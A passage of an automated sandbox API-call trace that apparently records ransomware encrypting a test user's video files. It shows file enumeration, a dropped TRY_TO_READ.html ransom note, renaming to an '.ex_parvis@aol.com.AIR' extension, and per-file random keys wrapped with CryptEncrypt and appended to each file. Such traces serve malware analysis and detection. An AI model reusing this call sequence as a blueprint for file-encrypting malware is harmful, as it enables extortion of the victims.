	[0107.092] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27a00, ftCreationTime.dwHighDateTime=0x1d4c6f9, ftLastAccessTime.dwLowDateTime=0x832efe80, ftLastAccessTime.dwHighDateTime=0x1d4cc1d, ftLastWriteTime.dwLowDateTime=0x832efe80, ftLastWriteTime.dwHighDateTime=0x1d4cc1d, nFileSizeHigh=0x0, nFileSizeLow=0x10e38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IjMne30p.flv", cAlternateFileName="6IJMNE~1.FLV")) returned 1
	[0107.092] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b9e6a10, ftCreationTime.dwHighDateTime=0x1d4cb64, ftLastAccessTime.dwLowDateTime=0x599aa0a0, ftLastAccessTime.dwHighDateTime=0x1d4c656, ftLastWriteTime.dwLowDateTime=0x599aa0a0, ftLastWriteTime.dwHighDateTime=0x1d4c656, nFileSizeHigh=0x0, nFileSizeLow=0x17dc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CsFoj5a.mp4", cAlternateFileName="")) returned 1
	[0107.092] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a3a4bb0, ftCreationTime.dwHighDateTime=0x1d4d2c9, ftLastAccessTime.dwLowDateTime=0xc2f81470, ftLastAccessTime.dwHighDateTime=0x1d4cc13, ftLastWriteTime.dwLowDateTime=0xc2f81470, ftLastWriteTime.dwHighDateTime=0x1d4cc13, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jfiJ96Ew3lP", cAlternateFileName="JFIJ96~1")) returned 1
	[0107.092] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\jfiJ96Ew3lP\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\jfij96ew3lp\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.094] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5005aef0, ftCreationTime.dwHighDateTime=0x1d4d122, ftLastAccessTime.dwLowDateTime=0xf188b800, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xf188b800, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x8601, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JJ O2LcoQdVK_NNWh.flv", cAlternateFileName="JJO2LC~1.FLV")) returned 1
	[0107.094] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c6f89c0, ftCreationTime.dwHighDateTime=0x1d4d054, ftLastAccessTime.dwLowDateTime=0x6a321600, ftLastAccessTime.dwHighDateTime=0x1d4c5ca, ftLastWriteTime.dwLowDateTime=0x6a321600, ftLastWriteTime.dwHighDateTime=0x1d4c5ca, nFileSizeHigh=0x0, nFileSizeLow=0x6d86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ns0YcNqg C_ca6TOKz.flv", cAlternateFileName="NS0YCN~1.FLV")) returned 1
	[0107.094] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de87080, ftCreationTime.dwHighDateTime=0x1d4cb58, ftLastAccessTime.dwLowDateTime=0x32594f00, ftLastAccessTime.dwHighDateTime=0x1d4d0ec, ftLastWriteTime.dwLowDateTime=0x32594f00, ftLastWriteTime.dwHighDateTime=0x1d4d0ec, nFileSizeHigh=0x0, nFileSizeLow=0x725e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OrKU5G4NtTVlIa.avi", cAlternateFileName="ORKU5G~1.AVI")) returned 1
	[0107.094] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92384950, ftCreationTime.dwHighDateTime=0x1d4cb0e, ftLastAccessTime.dwLowDateTime=0x9570cf30, ftLastAccessTime.dwHighDateTime=0x1d4ca36, ftLastWriteTime.dwLowDateTime=0x9570cf30, ftLastWriteTime.dwHighDateTime=0x1d4ca36, nFileSizeHigh=0x0, nFileSizeLow=0xcb99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QBl_UTnFFdPHbpQqDGR.mkv", cAlternateFileName="QBL_UT~1.MKV")) returned 1
	[0107.094] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe66048b0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe66048b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.095] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65d8b170, ftCreationTime.dwHighDateTime=0x1d4d053, ftLastAccessTime.dwLowDateTime=0xa01f4730, ftLastAccessTime.dwHighDateTime=0x1d4d2f2, ftLastWriteTime.dwLowDateTime=0xa01f4730, ftLastWriteTime.dwHighDateTime=0x1d4d2f2, nFileSizeHigh=0x0, nFileSizeLow=0xafae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wQneUijmLg.avi", cAlternateFileName="WQNEUI~1.AVI")) returned 1
	[0107.095] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556e7810, ftCreationTime.dwHighDateTime=0x1d4ca04, ftLastAccessTime.dwLowDateTime=0x3c972610, ftLastAccessTime.dwHighDateTime=0x1d4d040, ftLastWriteTime.dwLowDateTime=0x3c972610, ftLastWriteTime.dwHighDateTime=0x1d4d040, nFileSizeHigh=0x0, nFileSizeLow=0xfa83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wVZyDj.avi", cAlternateFileName="")) returned 1
	[0107.095] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556e7810, ftCreationTime.dwHighDateTime=0x1d4ca04, ftLastAccessTime.dwLowDateTime=0x3c972610, ftLastAccessTime.dwHighDateTime=0x1d4d040, ftLastWriteTime.dwLowDateTime=0x3c972610, ftLastWriteTime.dwHighDateTime=0x1d4d040, nFileSizeHigh=0x0, nFileSizeLow=0xfa83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wVZyDj.avi", cAlternateFileName="")) returned 0
	[0107.095] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.095] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.095] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi", dwFileAttributes=0x80) returned 1
	[0107.095] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi") returned 65
	[0107.095] GetProcessHeap () returned 0x540000
	[0107.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe8) returned 0x56efb8
	[0107.095] lstrcpyW (in: lpString1=0x56efb8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi"
	[0107.095] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.095] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\wvzydj.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\wvzydj.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.098] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wVZyDj.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\wvzydj.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.098] GetProcessHeap () returned 0x540000
	[0107.098] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56efb8 | out: hHeap=0x540000) returned 1
	[0107.098] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=64131) returned 1
	[0107.098] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xfa83
	[0107.098] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.098] GetProcessHeap () returned 0x540000
	[0107.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.098] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.098] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.100] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.100] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.100] ReadFile (in: hFile=0x55c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xfa83, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xfa83, lpOverlapped=0x0) returned 1
	[0107.102] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.102] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.102] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi", dwFileAttributes=0x80) returned 1
	[0107.102] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi") returned 69
	[0107.102] GetProcessHeap () returned 0x540000
	[0107.102] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x56efb8
	[0107.102] lstrcpyW (in: lpString1=0x56efb8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi"
	[0107.102] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.102] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\wqneuijmlg.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\wqneuijmlg.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.105] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\wQneUijmLg.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\wqneuijmlg.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.105] GetProcessHeap () returned 0x540000
	[0107.105] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56efb8 | out: hHeap=0x540000) returned 1
	[0107.105] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=44974) returned 1
	[0107.105] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xafae
	[0107.105] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.105] GetProcessHeap () returned 0x540000
	[0107.105] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.105] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.107] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.108] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.108] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.109] ReadFile (in: hFile=0x55c, lpBuffer=0x629bb8, nNumberOfBytesToRead=0xafae, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x629bb8*, lpNumberOfBytesRead=0x3a1f778*=0xafae, lpOverlapped=0x0) returned 1
	[0107.110] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.110] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.110] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv", dwFileAttributes=0x80) returned 1
	[0107.110] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv") returned 78
	[0107.110] GetProcessHeap () returned 0x540000
	[0107.110] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x56b448
	[0107.110] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv"
	[0107.110] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.110] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\qbl_utnffdphbpqqdgr.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\qbl_utnffdphbpqqdgr.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.113] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\QBl_UTnFFdPHbpQqDGR.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\qbl_utnffdphbpqqdgr.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.113] GetProcessHeap () returned 0x540000
	[0107.113] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0107.113] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=52121) returned 1
	[0107.113] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xcb99
	[0107.113] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.113] GetProcessHeap () returned 0x540000
	[0107.113] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.113] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.114] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.115] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.115] WriteFile (in: hFile=0x55c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.116] ReadFile (in: hFile=0x55c, lpBuffer=0x629bb8, nNumberOfBytesToRead=0xcb99, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x629bb8*, lpNumberOfBytesRead=0x3a1f778*=0xcb99, lpOverlapped=0x0) returned 1
	[0107.118] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.118] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.118] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi", dwFileAttributes=0x80) returned 1
	[0107.121] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi") returned 73
	[0107.121] GetProcessHeap () returned 0x540000
	[0107.121] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x56b448
	[0107.121] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi"
	[0107.121] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.121] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\orku5g4nttvlia.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\orku5g4nttvlia.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.125] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\OrKU5G4NtTVlIa.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qdilxlzczpyooloj\\orku5g4nttvlia.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c
	[0107.125] GetProcessHeap () returned 0x540000
	[0107.125] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0107.125] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=29278) returned 1
	[0107.125] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x725e
	[0107.125] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.125] GetProcessHeap () returned 0x540000
	[0107.125] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.125] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.127] WriteFile (in: hFile=0x55c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
